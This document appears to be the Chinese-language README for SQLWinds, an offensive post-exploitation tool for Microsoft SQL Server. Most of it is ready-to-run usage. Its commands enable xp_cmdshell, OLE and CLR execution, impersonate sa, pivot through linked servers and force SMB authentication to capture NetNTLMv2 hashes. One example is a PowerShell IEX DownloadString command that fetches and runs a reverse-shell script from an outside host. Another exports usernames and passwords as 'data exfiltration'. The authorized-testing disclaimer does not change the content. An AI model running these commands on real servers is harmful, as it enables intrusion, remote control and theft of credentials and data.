SQLWinds - SQL Server 安全评估与后渗透工具包
SQL 安全评估与后渗透工具包
SQLWinds 是一款用于对 Microsoft SQL Server 进行安全测试与利用的命令行工具。它提供了一个交互式环境,可深度分析服务器、提升权限、执行攻击并在网络中横向移动,同时配备用于内存代码执行和 SCCM 数据库探测等任务的专用命令。
快速链接:
--integrated)和 Kerberos 委派(--kerberos 配合 --user/--pass)。xp_cmdshell、OLE 自动化过程(sp_oacreate)和 CLR 集成。:memclr)。:unc_smb)。xp_regread 读取注册表项和值。该仓库包含一个 build.bat 脚本,便于在 Windows 上编译:
.\build.bat
编译后的 SQLWinds.exe 可执行文件将位于 bin\Release\ 目录中。
git clone https://github.com/blue0x1/sqlwinds.git
cd sqlwinds
msbuild SQLWinds.sln /p:Configuration=Release
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123
# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated
# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!
# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"
| 选项 | 描述 |
|---|---|
--server | 目标服务器(IP、主机名、实例)。必填。 |
--user, --pass | SQL 或 Windows 身份验证的凭据。 |
--integrated | 使用当前 Windows 令牌进行身份验证。 |
--kerberos | 使用 Kerberos 身份验证流程。 |
--spn-check | 检查 AD 中目标主机的 SPN。 |
--run-cmd "<SQL>" | 执行单条 SQL 命令并退出。 |
--run-file file.sql | 从文件执行 SQL 脚本并退出。 |
--info | 收集并显示全面的服务器信息。 |
--getinstance | 发现域中的 SQL 实例并退出。 |
--list-dbs | 列出数据库并退出。 |
--security-audit | 执行安全审计并退出。 |
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help
| 命令 | 描述 | 示例 |
|---|---|---|
:info | 显示详细的服务器信息 | :info |
:dbs | 列出所有数据库及详细信息 | :dbs |
:tables [db] [schema] | 列出数据库/架构中的表 | :tables master dbo |
:columns <table> [schema] [db] | 列出表的列 | :columns Users dbo MyDatabase |
:users | 列出所有 SQL 登录名和数据库用户 | :users |
:perms | 显示当前用户权限 | :perms |
:audit | 执行安全配置审计 | :audit |
:search [term] | 搜索敏感数据 | :search password |
:secrets | 提取潜在机密 | :secrets |
:services | 显示 SQL Server 服务帐户 | :services |
:spn | 检查目标主机的 SPN | :spn |
:enable_xp_cmdshell | 启用 xp_cmdshell | :enable_xp_cmdshell |
:disable_xp_cmdshell | 禁用 xp_cmdshell | :disable_xp_cmdshell |
:xp <command> | 通过 xp_cmdshell 运行操作系统命令 | :xp whoami |
:enable_ole | 启用 OLE 自动化 | :enable_ole |
:disable_ole | 禁用 OLE 自动化 | :disable_ole |
:ole_cmd <command> | 通过 OLE 运行操作系统命令 | :ole_cmd "calc.exe" |
:enable_clr | 启用 CLR 集成 | :enable_clr |
:disable_clr | 禁用 CLR 集成 | :disable_clr |
:deploy-clr <path> | 从文件部署 CLR 程序集 | :deploy-clr C:\Tools\cmd.dll |
:list-assemblies | 列出已部署的 CLR 程序集 | :list-assemblies |
:clr_exec | 执行 CLR 方法 | :clr_exec MyAssembly MyClass Method arg1 |
:memclr | 从内存执行 CLR 程序集 | :memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg" |
:remove-assembly <name> | 移除 CLR 程序集 | :remove-assembly MyAssembly |
:list_linkservers | 列出链接服务器 | :list_linkservers |
:linkrpc <srv> <cmd> | 通过链接服务器执行命令 | :linkrpc LINKEDSRV "whoami" |
:impersonate <login> | 模拟 SQL 登录名 | :impersonate sa |
:revert | 还原安全上下文 | :revert |
:agent_job | 管理 SQL 代理作业 | :agent_job create MyJob "whoami" |
:ls [path] | 通过 SQL 列出目录 | :ls C:\Windows\Temp |
:unc_smb <path> | 强制向 UNC 进行 SMB 身份验证 | :unc_smb \\192.168.1.100\share |
:plain | 粘贴大型 SQL 脚本 | (参见下面的示例) |
:regread | 读取注册表值 | :regread HKEY_LOCAL_MACHINE Software\Microsoft value |
:regread_all | 列出某个键中的所有值 | :regread_all HKEY_LOCAL_MACHINE Software\Microsoft |
:upload | 将文件上传到表 | :upload C:\file.txt MyTable |
:download | 从查询下载二进制文件 | :download "SELECT file FROM blobs" out.bin |
:exportcsv | 将查询导出为 CSV | :exportcsv "SELECT * FROM users" out.csv |
:exportjson | 将查询导出为 JSON | :exportjson "SELECT * FROM users" out.json |
:sccm_info | 检测 SCCM 数据库 | :sccm_info |
:sccm_inventory | 显示 SCCM 库存 | :sccm_inventory |
:sccm_collections | 列出 SCCM 集合 | :sccm_collections "All Systems" |
:sccm_deployments | 显示部署 | :sccm_deployments |
:sccm_clients | 列出客户端 | :sccm_clients inactive |
:sccm_audit | SCCM 安全审计 | :sccm_audit |
:sccm_application | 显示应用程序详细信息 | :sccm_application "Google Chrome" |
help | 显示帮助 | help |
exit | 退出 REPL | exit |
:plain 处理大型脚本:plain 命令对于执行大型多行 SQL 脚本至关重要。
sqlwinds> :plain
SQL>
SQL> BEGIN TRY
.....> SELECT * FROM [VeryImportantTable];
.....> EXEC sp_configure 'show advanced options', 1;
.....> RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....> SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
:plain 并按回车。:execute 运行整个脚本,或输入 :cancel 中止。1. 审计
SQLWinds.exe --server dc01 --integrated --security-audit
2. 利用 xp_cmdshell 执行代码
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# In the REPL that opens:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"
3. 内存 CLR 执行(无文件)
# Compile your .NET assembly to a DLL (e.g., CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"
4. 通过 SRelay 窃取 NetNTLMv2 哈希
# On your machine: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share
5. SCCM 数据库利用
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"
6. 数据外传
# Export sensitive data to CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv
# Download a file stored in the database
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx
我们欢迎贡献!如果您有改进想法或发现任何问题:
本工具仅用于授权安全测试和教育目的。对您不拥有或未经明确许可测试的系统进行未经授权的使用是违法的。开发者不承担任何责任,也不对因本程序造成的任何误用或损害负责。
由 blue0x1 开发。